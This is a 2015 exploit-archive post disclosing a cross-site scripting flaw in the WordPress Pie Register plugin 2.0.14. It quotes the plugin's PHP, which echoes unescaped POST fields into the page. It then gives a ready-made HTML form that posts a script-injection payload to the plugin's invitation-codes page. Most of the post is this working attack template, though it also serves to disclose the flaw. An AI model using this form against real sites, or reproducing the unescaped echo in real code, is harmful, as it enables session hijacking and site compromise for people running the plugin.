Home / exploits WordPress Pie Register 2.0.14 Cross Site Scripting
Posted on 11 March 2015
[+]Title: Wordpress Pie Register Plugin 2.0.14 - XSS Vulnerability [+]Author: TUNISIAN CYBER [+]Date: 09/03/2015 [+]Type:WebApp [+]Risk:High [+]Affected Version:All [+]Overview: Pie Register 2.x suffers, from an XSS vulnerability. [+]Proof Of Concept: [PHP] global $piereg_dir_path; include_once( PIEREG_DIR_NAME."/classes/invitation_code_pagination.php"); if(isset($_POST['notice']) && $_POST['notice'] ){ echo '<div id="message" class="updated fade"><p><strong>' . $_POST['notice'] . '.</strong></p></div>'; }elseif(isset($_POST['error']) && $_POST['error'] ){ echo '<div id="error" class="error fade"><p><strong>' . $_POST['error'] . '.</strong></p></div>'; } [PHP] Exploit Code: [HTML] <head> <meta http-equiv="Content-Language" content="fr"> </head> <form action="http://ste/wp-content/plugins/pie-register/menus/PieRegInvitationCodes.php" method="POST"> <body bgcolor="#000000"> <p align="center"> <input type="text" name="notice" value='"><script>alert(/XSSeD/)</script>' <input type="submit" value="XSS"></p> <p align="center"> <font color="#FFFFFF" face="Adobe Gothic Std B">Wordpress Pie Register Plugin 2.0.14 - XSS Vulnerability</font></p> [HTML] http://i.imgur.com/L5KXmKI.png
